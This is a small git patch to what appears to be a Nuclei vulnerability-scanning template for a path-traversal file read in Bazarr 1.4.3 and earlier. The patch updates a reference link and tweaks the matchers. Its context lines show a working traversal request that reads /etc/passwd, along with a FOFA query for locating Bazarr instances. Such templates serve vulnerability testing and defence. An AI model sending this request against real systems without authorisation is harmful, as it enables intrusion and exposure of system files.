From 3c9ba8908bcd433c5829f3b15a6da2c8a917da55 Mon Sep 17 00:00:00 2001
From: Dhiyaneshwaran <leedhiyanesh@gmail.com>
Date: Sun, 21 Jul 2024 14:21:48 +0530
Subject: [PATCH] minor-update

---
 http/vulnerabilities/other/bazarr-arbitrary-file-read.yaml | 5 +++--
 1 file changed, 3 insertions(+), 2 deletions(-)

diff --git a/http/vulnerabilities/other/bazarr-arbitrary-file-read.yaml b/http/vulnerabilities/other/bazarr-arbitrary-file-read.yaml
index 45b31d282d..c4953b556d 100644
--- a/http/vulnerabilities/other/bazarr-arbitrary-file-read.yaml
+++ b/http/vulnerabilities/other/bazarr-arbitrary-file-read.yaml
@@ -7,13 +7,14 @@ info:
   description: |
     Bazarr 1.4.3 and earlier versions have a arbitrary file read vulnerability.
   reference:
-    - https://github.com/4rdr/proofs/blob/d70b285245ac6e6efc71aa82c4aac8a4c615c29f/info/Bazaar_1.4.3_File_Traversal_via_Filename.md
+    - https://github.com/4rdr/proofs/blob/main/info/Bazaar_1.4.3_File_Traversal_via_Filename.md
     - https://www.bazarr.media/
   metadata:
     vendor: morpheus65535
     product: bazarr
     fofa-query: title=="Bazarr" && icon_hash="-1983413099"
   tags: bazarr,lfi
+
 flow: http(1) && http(2)
 
 http:
@@ -23,6 +24,7 @@ http:
 
     matchers:
       - type: word
+        part: body
         words:
           - '<title>Bazarr</title>'
         internal: true
@@ -32,7 +34,6 @@ http:
         GET /api/swaggerui/static/../../../../../../../../../../../../../../../../etc/passwd HTTP/1.1
         Host: {{Hostname}}
 
-
     matchers-condition: and
     matchers:
       - type: regex